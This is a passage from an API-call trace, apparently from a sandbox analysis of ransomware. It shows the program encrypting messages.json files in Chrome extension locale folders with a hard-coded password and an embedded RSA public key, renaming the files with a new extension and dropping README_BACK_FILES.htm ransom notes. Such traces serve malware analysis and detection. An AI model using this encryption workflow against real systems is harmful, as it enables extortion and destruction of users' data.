CryptEncrypt (in: hKey=0x2e7d380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e707c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e707c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.749] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e707c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e707c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.750] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0260.751] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x130, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x140) returned 1 [0260.751] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x140, lpOverlapped=0x0) returned 1 [0260.751] CloseHandle (hObject=0x5d64) returned 1 [0260.752] CloseHandle (hObject=0x5d5c) returned 1 [0260.752] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0260.755] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0260.755] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.gsg")) returned 1 [0260.757] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.fuck")) returned 1 [0260.758] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.758] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.758] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.758] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.758] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.759] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0260.759] AreFileApisANSI () returned 1 [0260.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.759] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.760] GetFileType (hFile=0x5d60) returned 0x1 [0260.760] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.761] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.761] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.761] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.761] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.761] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.761] GetLastError () returned 0x0 [0260.761] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json")) returned 0x20 [0260.762] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0260.762] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.763] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.765] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.765] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.767] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.767] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0260.767] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.767] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.768] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.768] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.768] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70628) returned 1 [0260.768] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70628, dwCertEncodingType=0x1, pInfo=0x2eab610*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab640*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab648*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d1c0) returned 1 [0260.768] CryptEncrypt (in: hKey=0x2e7d1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.768] CryptEncrypt (in: hKey=0x2e7d1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70b78*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70b78*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.769] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e70b78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70b78*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.770] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xe8, lpOverlapped=0x0) returned 1 [0260.771] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe8, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.771] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.771] CloseHandle (hObject=0x5d5c) returned 1 [0260.771] CloseHandle (hObject=0x5d64) returned 1 [0260.771] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0260.775] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0260.776] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.gsg")) returned 1 [0260.777] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.fuck")) returned 1 [0260.778] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.778] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.778] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.778] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.778] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.778] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0260.779] AreFileApisANSI () returned 1 [0260.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.779] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.780] GetFileType (hFile=0x5d60) returned 0x1 [0260.780] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.781] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.781] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.782] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.782] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.782] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.782] GetLastError () returned 0x0 [0260.782] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json")) returned 0x20 [0260.783] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x80) returned 1 [0260.783] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.784] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.785] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.785] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.787] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.788] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0260.788] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.788] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.788] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.788] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.788] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70c00) returned 1 [0260.788] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70c00, dwCertEncodingType=0x1, pInfo=0x2eac240*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac270*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac278*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d140) returned 1 [0260.788] CryptEncrypt (in: hKey=0x2e7d140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.788] CryptEncrypt (in: hKey=0x2e7d140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70ea8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70ea8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.789] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e70ea8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70ea8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.790] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x102, lpOverlapped=0x0) returned 1 [0260.792] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x102, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0260.792] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0260.792] CloseHandle (hObject=0x5d64) returned 1 [0260.792] CloseHandle (hObject=0x5d5c) returned 1 [0260.792] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), bFailIfExists=0) returned 1 [0260.796] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x0) returned 1 [0260.796] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.gsg")) returned 1 [0260.797] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.fuck")) returned 1 [0260.799] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.799] CryptDestroyKey (hKey=0x2e7ce40) returned 